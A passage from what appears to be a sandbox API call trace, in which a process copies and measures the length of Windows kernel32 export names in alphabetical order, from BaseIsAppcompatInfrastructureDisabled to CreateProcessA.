lpString1=0x3f2d1ec, lpString2="BaseIsAppcompatInfrastructureDisabled" | out: lpString1="BaseIsAppcompatInfrastructureDisabled") returned="BaseIsAppcompatInfrastructureDisabled" [0085.480] lstrlenA (lpString="BASEISAPPCOMPATINFRASTRUCTUREDISABLED") returned 37 [0085.480] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseQueryModuleData" | out: lpString1="BaseQueryModuleData") returned="BaseQueryModuleData" [0085.481] lstrlenA (lpString="BASEQUERYMODULEDATA") returned 19 [0085.481] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseSetLastNTError" | out: lpString1="BaseSetLastNTError") returned="BaseSetLastNTError" [0085.481] lstrlenA (lpString="BASESETLASTNTERROR") returned 18 [0085.481] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseThreadInitThunk" | out: lpString1="BaseThreadInitThunk") returned="BaseThreadInitThunk" [0085.481] lstrlenA (lpString="BASETHREADINITTHUNK") returned 19 [0085.481] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseUpdateAppcompatCache" | out: lpString1="BaseUpdateAppcompatCache") returned="BaseUpdateAppcompatCache" [0085.481] lstrlenA (lpString="BASEUPDATEAPPCOMPATCACHE") returned 24 [0085.481] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseVerifyUnicodeString" | out: lpString1="BaseVerifyUnicodeString") returned="BaseVerifyUnicodeString" [0085.481] lstrlenA (lpString="BASEVERIFYUNICODESTRING") returned 23 [0085.481] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="Basep8BitStringToDynamicUnicodeString" | out: lpString1="Basep8BitStringToDynamicUnicodeString") returned="Basep8BitStringToDynamicUnicodeString" [0085.481] lstrlenA (lpString="BASEP8BITSTRINGTODYNAMICUNICODESTRING") returned 37 [0085.481] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepAllocateActivationContextActivationBlock" | out: lpString1="BasepAllocateActivationContextActivationBlock") returned="BasepAllocateActivationContextActivationBlock" [0085.481] lstrlenA (lpString="BASEPALLOCATEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 45 [0085.481] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepAnsiStringToDynamicUnicodeString" | out: lpString1="BasepAnsiStringToDynamicUnicodeString") returned="BasepAnsiStringToDynamicUnicodeString" [0085.481] lstrlenA (lpString="BASEPANSISTRINGTODYNAMICUNICODESTRING") returned 37 [0085.481] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepCheckAppCompat" | out: lpString1="BasepCheckAppCompat") returned="BasepCheckAppCompat" [0085.481] lstrlenA (lpString="BASEPCHECKAPPCOMPAT") returned 19 [0085.481] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepCheckBadapp" | out: lpString1="BasepCheckBadapp") returned="BasepCheckBadapp" [0085.481] lstrlenA (lpString="BASEPCHECKBADAPP") returned 16 [0085.481] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepCheckWinSaferRestrictions" | out: lpString1="BasepCheckWinSaferRestrictions") returned="BasepCheckWinSaferRestrictions" [0085.481] lstrlenA (lpString="BASEPCHECKWINSAFERRESTRICTIONS") returned 30 [0085.481] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepFreeActivationContextActivationBlock" | out: lpString1="BasepFreeActivationContextActivationBlock") returned="BasepFreeActivationContextActivationBlock" [0085.481] lstrlenA (lpString="BASEPFREEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 41 [0085.481] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepFreeAppCompatData" | out: lpString1="BasepFreeAppCompatData") returned="BasepFreeAppCompatData" [0085.481] lstrlenA (lpString="BASEPFREEAPPCOMPATDATA") returned 22 [0085.481] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepMapModuleHandle" | out: lpString1="BasepMapModuleHandle") returned="BasepMapModuleHandle" [0085.481] lstrlenA (lpString="BASEPMAPMODULEHANDLE") returned 20 [0085.481] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="Beep" | out: lpString1="Beep") returned="Beep" [0085.481] lstrlenA (lpString="BEEP") returned 4 [0085.481] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BeginUpdateResourceA" | out: lpString1="BeginUpdateResourceA") returned="BeginUpdateResourceA" [0085.481] lstrlenA (lpString="BEGINUPDATERESOURCEA") returned 20 [0085.481] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BeginUpdateResourceW" | out: lpString1="BeginUpdateResourceW") returned="BeginUpdateResourceW" [0085.481] lstrlenA (lpString="BEGINUPDATERESOURCEW") returned 20 [0085.481] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BindIoCompletionCallback" | out: lpString1="BindIoCompletionCallback") returned="BindIoCompletionCallback" [0085.481] lstrlenA (lpString="BINDIOCOMPLETIONCALLBACK") returned 24 [0085.481] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BuildCommDCBA" | out: lpString1="BuildCommDCBA") returned="BuildCommDCBA" [0085.482] lstrlenA (lpString="BUILDCOMMDCBA") returned 13 [0085.482] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BuildCommDCBAndTimeoutsA" | out: lpString1="BuildCommDCBAndTimeoutsA") returned="BuildCommDCBAndTimeoutsA" [0085.482] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSA") returned 24 [0085.482] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BuildCommDCBAndTimeoutsW" | out: lpString1="BuildCommDCBAndTimeoutsW") returned="BuildCommDCBAndTimeoutsW" [0085.482] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSW") returned 24 [0085.482] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BuildCommDCBW" | out: lpString1="BuildCommDCBW") returned="BuildCommDCBW" [0085.482] lstrlenA (lpString="BUILDCOMMDCBW") returned 13 [0085.482] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CallNamedPipeA" | out: lpString1="CallNamedPipeA") returned="CallNamedPipeA" [0085.482] lstrlenA (lpString="CALLNAMEDPIPEA") returned 14 [0085.482] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CallNamedPipeW" | out: lpString1="CallNamedPipeW") returned="CallNamedPipeW" [0085.482] lstrlenA (lpString="CALLNAMEDPIPEW") returned 14 [0085.482] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CallbackMayRunLong" | out: lpString1="CallbackMayRunLong") returned="CallbackMayRunLong" [0085.482] lstrlenA (lpString="CALLBACKMAYRUNLONG") returned 18 [0085.482] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CancelDeviceWakeupRequest" | out: lpString1="CancelDeviceWakeupRequest") returned="CancelDeviceWakeupRequest" [0085.482] lstrlenA (lpString="CANCELDEVICEWAKEUPREQUEST") returned 25 [0085.482] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CancelIo" | out: lpString1="CancelIo") returned="CancelIo" [0085.482] lstrlenA (lpString="CANCELIO") returned 8 [0085.482] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CancelIoEx" | out: lpString1="CancelIoEx") returned="CancelIoEx" [0085.482] lstrlenA (lpString="CANCELIOEX") returned 10 [0085.482] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CancelSynchronousIo" | out: lpString1="CancelSynchronousIo") returned="CancelSynchronousIo" [0085.482] lstrlenA (lpString="CANCELSYNCHRONOUSIO") returned 19 [0085.482] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CancelThreadpoolIo" | out: lpString1="CancelThreadpoolIo") returned="CancelThreadpoolIo" [0085.482] lstrlenA (lpString="CANCELTHREADPOOLIO") returned 18 [0085.482] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CancelTimerQueueTimer" | out: lpString1="CancelTimerQueueTimer") returned="CancelTimerQueueTimer" [0085.482] lstrlenA (lpString="CANCELTIMERQUEUETIMER") returned 21 [0085.482] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CancelWaitableTimer" | out: lpString1="CancelWaitableTimer") returned="CancelWaitableTimer" [0085.482] lstrlenA (lpString="CANCELWAITABLETIMER") returned 19 [0085.482] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ChangeTimerQueueTimer" | out: lpString1="ChangeTimerQueueTimer") returned="ChangeTimerQueueTimer" [0085.482] lstrlenA (lpString="CHANGETIMERQUEUETIMER") returned 21 [0085.482] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CheckElevation" | out: lpString1="CheckElevation") returned="CheckElevation" [0085.482] lstrlenA (lpString="CHECKELEVATION") returned 14 [0085.482] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CheckElevationEnabled" | out: lpString1="CheckElevationEnabled") returned="CheckElevationEnabled" [0085.483] lstrlenA (lpString="CHECKELEVATIONENABLED") returned 21 [0085.483] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CheckForReadOnlyResource" | out: lpString1="CheckForReadOnlyResource") returned="CheckForReadOnlyResource" [0085.483] lstrlenA (lpString="CHECKFORREADONLYRESOURCE") returned 24 [0085.483] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CheckNameLegalDOS8Dot3A" | out: lpString1="CheckNameLegalDOS8Dot3A") returned="CheckNameLegalDOS8Dot3A" [0085.483] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3A") returned 23 [0085.483] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CheckNameLegalDOS8Dot3W" | out: lpString1="CheckNameLegalDOS8Dot3W") returned="CheckNameLegalDOS8Dot3W" [0085.483] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3W") returned 23 [0085.483] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CheckRemoteDebuggerPresent" | out: lpString1="CheckRemoteDebuggerPresent") returned="CheckRemoteDebuggerPresent" [0085.483] lstrlenA (lpString="CHECKREMOTEDEBUGGERPRESENT") returned 26 [0085.483] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ClearCommBreak" | out: lpString1="ClearCommBreak") returned="ClearCommBreak" [0085.483] lstrlenA (lpString="CLEARCOMMBREAK") returned 14 [0085.483] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ClearCommError" | out: lpString1="ClearCommError") returned="ClearCommError" [0085.483] lstrlenA (lpString="CLEARCOMMERROR") returned 14 [0085.483] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseConsoleHandle" | out: lpString1="CloseConsoleHandle") returned="CloseConsoleHandle" [0085.483] lstrlenA (lpString="CLOSECONSOLEHANDLE") returned 18 [0085.483] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseHandle" | out: lpString1="CloseHandle") returned="CloseHandle" [0085.483] lstrlenA (lpString="CLOSEHANDLE") returned 11 [0085.483] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ClosePrivateNamespace" | out: lpString1="ClosePrivateNamespace") returned="ClosePrivateNamespace" [0085.483] lstrlenA (lpString="CLOSEPRIVATENAMESPACE") returned 21 [0085.483] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseProfileUserMapping" | out: lpString1="CloseProfileUserMapping") returned="CloseProfileUserMapping" [0085.483] lstrlenA (lpString="CLOSEPROFILEUSERMAPPING") returned 23 [0085.483] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseThreadpool" | out: lpString1="CloseThreadpool") returned="CloseThreadpool" [0085.483] lstrlenA (lpString="CLOSETHREADPOOL") returned 15 [0085.483] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseThreadpoolCleanupGroup" | out: lpString1="CloseThreadpoolCleanupGroup") returned="CloseThreadpoolCleanupGroup" [0085.483] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUP") returned 27 [0085.483] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseThreadpoolCleanupGroupMembers" | out: lpString1="CloseThreadpoolCleanupGroupMembers") returned="CloseThreadpoolCleanupGroupMembers" [0085.483] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUPMEMBERS") returned 34 [0085.483] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseThreadpoolIo" | out: lpString1="CloseThreadpoolIo") returned="CloseThreadpoolIo" [0085.483] lstrlenA (lpString="CLOSETHREADPOOLIO") returned 17 [0085.483] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseThreadpoolTimer" | out: lpString1="CloseThreadpoolTimer") returned="CloseThreadpoolTimer" [0085.483] lstrlenA (lpString="CLOSETHREADPOOLTIMER") returned 20 [0085.483] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseThreadpoolWait" | out: lpString1="CloseThreadpoolWait") returned="CloseThreadpoolWait" [0085.483] lstrlenA (lpString="CLOSETHREADPOOLWAIT") returned 19 [0085.483] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseThreadpoolWork" | out: lpString1="CloseThreadpoolWork") returned="CloseThreadpoolWork" [0085.484] lstrlenA (lpString="CLOSETHREADPOOLWORK") returned 19 [0085.484] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CmdBatNotification" | out: lpString1="CmdBatNotification") returned="CmdBatNotification" [0085.484] lstrlenA (lpString="CMDBATNOTIFICATION") returned 18 [0085.484] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CommConfigDialogA" | out: lpString1="CommConfigDialogA") returned="CommConfigDialogA" [0085.484] lstrlenA (lpString="COMMCONFIGDIALOGA") returned 17 [0085.484] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CommConfigDialogW" | out: lpString1="CommConfigDialogW") returned="CommConfigDialogW" [0085.484] lstrlenA (lpString="COMMCONFIGDIALOGW") returned 17 [0085.484] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CompareCalendarDates" | out: lpString1="CompareCalendarDates") returned="CompareCalendarDates" [0085.484] lstrlenA (lpString="COMPARECALENDARDATES") returned 20 [0085.484] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CompareFileTime" | out: lpString1="CompareFileTime") returned="CompareFileTime" [0085.484] lstrlenA (lpString="COMPAREFILETIME") returned 15 [0085.484] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CompareStringA" | out: lpString1="CompareStringA") returned="CompareStringA" [0085.484] lstrlenA (lpString="COMPARESTRINGA") returned 14 [0085.484] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CompareStringEx" | out: lpString1="CompareStringEx") returned="CompareStringEx" [0085.484] lstrlenA (lpString="COMPARESTRINGEX") returned 15 [0085.484] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CompareStringOrdinal" | out: lpString1="CompareStringOrdinal") returned="CompareStringOrdinal" [0085.484] lstrlenA (lpString="COMPARESTRINGORDINAL") returned 20 [0085.484] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CompareStringW" | out: lpString1="CompareStringW") returned="CompareStringW" [0085.484] lstrlenA (lpString="COMPARESTRINGW") returned 14 [0085.484] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConnectNamedPipe" | out: lpString1="ConnectNamedPipe") returned="ConnectNamedPipe" [0085.484] lstrlenA (lpString="CONNECTNAMEDPIPE") returned 16 [0085.484] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConsoleMenuControl" | out: lpString1="ConsoleMenuControl") returned="ConsoleMenuControl" [0085.484] lstrlenA (lpString="CONSOLEMENUCONTROL") returned 18 [0085.484] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ContinueDebugEvent" | out: lpString1="ContinueDebugEvent") returned="ContinueDebugEvent" [0085.484] lstrlenA (lpString="CONTINUEDEBUGEVENT") returned 18 [0085.485] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConvertCalDateTimeToSystemTime" | out: lpString1="ConvertCalDateTimeToSystemTime") returned="ConvertCalDateTimeToSystemTime" [0085.485] lstrlenA (lpString="CONVERTCALDATETIMETOSYSTEMTIME") returned 30 [0085.485] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConvertDefaultLocale" | out: lpString1="ConvertDefaultLocale") returned="ConvertDefaultLocale" [0085.485] lstrlenA (lpString="CONVERTDEFAULTLOCALE") returned 20 [0085.485] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConvertFiberToThread" | out: lpString1="ConvertFiberToThread") returned="ConvertFiberToThread" [0085.485] lstrlenA (lpString="CONVERTFIBERTOTHREAD") returned 20 [0085.485] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConvertNLSDayOfWeekToWin32DayOfWeek" | out: lpString1="ConvertNLSDayOfWeekToWin32DayOfWeek") returned="ConvertNLSDayOfWeekToWin32DayOfWeek" [0085.485] lstrlenA (lpString="CONVERTNLSDAYOFWEEKTOWIN32DAYOFWEEK") returned 35 [0085.485] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConvertSystemTimeToCalDateTime" | out: lpString1="ConvertSystemTimeToCalDateTime") returned="ConvertSystemTimeToCalDateTime" [0085.485] lstrlenA (lpString="CONVERTSYSTEMTIMETOCALDATETIME") returned 30 [0085.485] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConvertThreadToFiber" | out: lpString1="ConvertThreadToFiber") returned="ConvertThreadToFiber" [0085.485] lstrlenA (lpString="CONVERTTHREADTOFIBER") returned 20 [0085.485] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConvertThreadToFiberEx" | out: lpString1="ConvertThreadToFiberEx") returned="ConvertThreadToFiberEx" [0085.485] lstrlenA (lpString="CONVERTTHREADTOFIBEREX") returned 22 [0085.485] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyContext" | out: lpString1="CopyContext") returned="CopyContext" [0085.485] lstrlenA (lpString="COPYCONTEXT") returned 11 [0085.485] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyFileA" | out: lpString1="CopyFileA") returned="CopyFileA" [0085.485] lstrlenA (lpString="COPYFILEA") returned 9 [0085.485] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyFileExA" | out: lpString1="CopyFileExA") returned="CopyFileExA" [0085.485] lstrlenA (lpString="COPYFILEEXA") returned 11 [0085.485] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyFileExW" | out: lpString1="CopyFileExW") returned="CopyFileExW" [0085.485] lstrlenA (lpString="COPYFILEEXW") returned 11 [0085.485] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyFileTransactedA" | out: lpString1="CopyFileTransactedA") returned="CopyFileTransactedA" [0085.486] lstrlenA (lpString="COPYFILETRANSACTEDA") returned 19 [0085.486] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyFileTransactedW" | out: lpString1="CopyFileTransactedW") returned="CopyFileTransactedW" [0085.486] lstrlenA (lpString="COPYFILETRANSACTEDW") returned 19 [0085.486] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyFileW" | out: lpString1="CopyFileW") returned="CopyFileW" [0085.486] lstrlenA (lpString="COPYFILEW") returned 9 [0085.486] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyLZFile" | out: lpString1="CopyLZFile") returned="CopyLZFile" [0085.486] lstrlenA (lpString="COPYLZFILE") returned 10 [0085.486] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateActCtxA" | out: lpString1="CreateActCtxA") returned="CreateActCtxA" [0085.486] lstrlenA (lpString="CREATEACTCTXA") returned 13 [0085.486] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateActCtxW" | out: lpString1="CreateActCtxW") returned="CreateActCtxW" [0085.486] lstrlenA (lpString="CREATEACTCTXW") returned 13 [0085.486] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateBoundaryDescriptorA" | out: lpString1="CreateBoundaryDescriptorA") returned="CreateBoundaryDescriptorA" [0085.486] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORA") returned 25 [0085.486] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateBoundaryDescriptorW" | out: lpString1="CreateBoundaryDescriptorW") returned="CreateBoundaryDescriptorW" [0085.486] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORW") returned 25 [0085.486] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateConsoleScreenBuffer" | out: lpString1="CreateConsoleScreenBuffer") returned="CreateConsoleScreenBuffer" [0085.486] lstrlenA (lpString="CREATECONSOLESCREENBUFFER") returned 25 [0085.486] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateDirectoryA" | out: lpString1="CreateDirectoryA") returned="CreateDirectoryA" [0085.486] lstrlenA (lpString="CREATEDIRECTORYA") returned 16 [0085.486] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateDirectoryExA" | out: lpString1="CreateDirectoryExA") returned="CreateDirectoryExA" [0085.486] lstrlenA (lpString="CREATEDIRECTORYEXA") returned 18 [0085.486] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateDirectoryExW" | out: lpString1="CreateDirectoryExW") returned="CreateDirectoryExW" [0085.486] lstrlenA (lpString="CREATEDIRECTORYEXW") returned 18 [0085.486] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateDirectoryTransactedA" | out: lpString1="CreateDirectoryTransactedA") returned="CreateDirectoryTransactedA" [0085.486] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDA") returned 26 [0085.486] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateDirectoryTransactedW" | out: lpString1="CreateDirectoryTransactedW") returned="CreateDirectoryTransactedW" [0085.486] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDW") returned 26 [0085.486] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateDirectoryW" | out: lpString1="CreateDirectoryW") returned="CreateDirectoryW" [0085.486] lstrlenA (lpString="CREATEDIRECTORYW") returned 16 [0085.486] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateEventA" | out: lpString1="CreateEventA") returned="CreateEventA" [0085.486] lstrlenA (lpString="CREATEEVENTA") returned 12 [0085.486] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateEventExA" | out: lpString1="CreateEventExA") returned="CreateEventExA" [0085.486] lstrlenA (lpString="CREATEEVENTEXA") returned 14 [0085.486] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateEventExW" | out: lpString1="CreateEventExW") returned="CreateEventExW" [0085.487] lstrlenA (lpString="CREATEEVENTEXW") returned 14 [0085.487] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateEventW" | out: lpString1="CreateEventW") returned="CreateEventW" [0085.487] lstrlenA (lpString="CREATEEVENTW") returned 12 [0085.487] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFiber" | out: lpString1="CreateFiber") returned="CreateFiber" [0085.487] lstrlenA (lpString="CREATEFIBER") returned 11 [0085.487] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFiberEx" | out: lpString1="CreateFiberEx") returned="CreateFiberEx" [0085.487] lstrlenA (lpString="CREATEFIBEREX") returned 13 [0085.487] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileA" | out: lpString1="CreateFileA") returned="CreateFileA" [0085.487] lstrlenA (lpString="CREATEFILEA") returned 11 [0085.487] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileMappingA" | out: lpString1="CreateFileMappingA") returned="CreateFileMappingA" [0085.487] lstrlenA (lpString="CREATEFILEMAPPINGA") returned 18 [0085.487] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileMappingNumaA" | out: lpString1="CreateFileMappingNumaA") returned="CreateFileMappingNumaA" [0085.487] lstrlenA (lpString="CREATEFILEMAPPINGNUMAA") returned 22 [0085.487] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileMappingNumaW" | out: lpString1="CreateFileMappingNumaW") returned="CreateFileMappingNumaW" [0085.487] lstrlenA (lpString="CREATEFILEMAPPINGNUMAW") returned 22 [0085.487] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileMappingW" | out: lpString1="CreateFileMappingW") returned="CreateFileMappingW" [0085.487] lstrlenA (lpString="CREATEFILEMAPPINGW") returned 18 [0085.487] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileTransactedA" | out: lpString1="CreateFileTransactedA") returned="CreateFileTransactedA" [0085.487] lstrlenA (lpString="CREATEFILETRANSACTEDA") returned 21 [0085.487] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileTransactedW" | out: lpString1="CreateFileTransactedW") returned="CreateFileTransactedW" [0085.487] lstrlenA (lpString="CREATEFILETRANSACTEDW") returned 21 [0085.487] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileW" | out: lpString1="CreateFileW") returned="CreateFileW" [0085.487] lstrlenA (lpString="CREATEFILEW") returned 11 [0085.487] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateHardLinkA" | out: lpString1="CreateHardLinkA") returned="CreateHardLinkA" [0085.487] lstrlenA (lpString="CREATEHARDLINKA") returned 15 [0085.487] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateHardLinkTransactedA" | out: lpString1="CreateHardLinkTransactedA") returned="CreateHardLinkTransactedA" [0085.487] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDA") returned 25 [0085.487] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateHardLinkTransactedW" | out: lpString1="CreateHardLinkTransactedW") returned="CreateHardLinkTransactedW" [0085.487] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDW") returned 25 [0085.487] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateHardLinkW" | out: lpString1="CreateHardLinkW") returned="CreateHardLinkW" [0085.487] lstrlenA (lpString="CREATEHARDLINKW") returned 15 [0085.488] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateIoCompletionPort" | out: lpString1="CreateIoCompletionPort") returned="CreateIoCompletionPort" [0085.488] lstrlenA (lpString="CREATEIOCOMPLETIONPORT") returned 22 [0085.488] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateJobObjectA" | out: lpString1="CreateJobObjectA") returned="CreateJobObjectA" [0085.488] lstrlenA (lpString="CREATEJOBOBJECTA") returned 16 [0085.488] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateJobObjectW" | out: lpString1="CreateJobObjectW") returned="CreateJobObjectW" [0085.488] lstrlenA (lpString="CREATEJOBOBJECTW") returned 16 [0085.488] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateJobSet" | out: lpString1="CreateJobSet") returned="CreateJobSet" [0085.488] lstrlenA (lpString="CREATEJOBSET") returned 12 [0085.488] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateMailslotA" | out: lpString1="CreateMailslotA") returned="CreateMailslotA" [0085.488] lstrlenA (lpString="CREATEMAILSLOTA") returned 15 [0085.488] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateMailslotW" | out: lpString1="CreateMailslotW") returned="CreateMailslotW" [0085.488] lstrlenA (lpString="CREATEMAILSLOTW") returned 15 [0085.488] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateMemoryResourceNotification" | out: lpString1="CreateMemoryResourceNotification") returned="CreateMemoryResourceNotification" [0085.488] lstrlenA (lpString="CREATEMEMORYRESOURCENOTIFICATION") returned 32 [0085.488] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateMutexA" | out: lpString1="CreateMutexA") returned="CreateMutexA" [0085.488] lstrlenA (lpString="CREATEMUTEXA") returned 12 [0085.488] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateMutexExA" | out: lpString1="CreateMutexExA") returned="CreateMutexExA" [0085.488] lstrlenA (lpString="CREATEMUTEXEXA") returned 14 [0085.488] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateMutexExW" | out: lpString1="CreateMutexExW") returned="CreateMutexExW" [0085.488] lstrlenA (lpString="CREATEMUTEXEXW") returned 14 [0085.488] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateMutexW" | out: lpString1="CreateMutexW") returned="CreateMutexW" [0085.488] lstrlenA (lpString="CREATEMUTEXW") returned 12 [0085.488] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateNamedPipeA" | out: lpString1="CreateNamedPipeA") returned="CreateNamedPipeA" [0085.488] lstrlenA (lpString="CREATENAMEDPIPEA") returned 16 [0085.488] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateNamedPipeW" | out: lpString1="CreateNamedPipeW") returned="CreateNamedPipeW" [0085.488] lstrlenA (lpString="CREATENAMEDPIPEW") returned 16 [0085.488] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreatePipe" | out: lpString1="CreatePipe") returned="CreatePipe" [0085.488] lstrlenA (lpString="CREATEPIPE") returned 10 [0085.488] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreatePrivateNamespaceA" | out: lpString1="CreatePrivateNamespaceA") returned="CreatePrivateNamespaceA" [0085.488] lstrlenA (lpString="CREATEPRIVATENAMESPACEA") returned 23 [0085.488] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreatePrivateNamespaceW" | out: lpString1="CreatePrivateNamespaceW") returned="CreatePrivateNamespaceW" [0085.488] lstrlenA (lpString="CREATEPRIVATENAMESPACEW") returned 23 [0085.489] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateProcessA" | out: lpString1="CreateProcessA") returned="CreateProcessA" 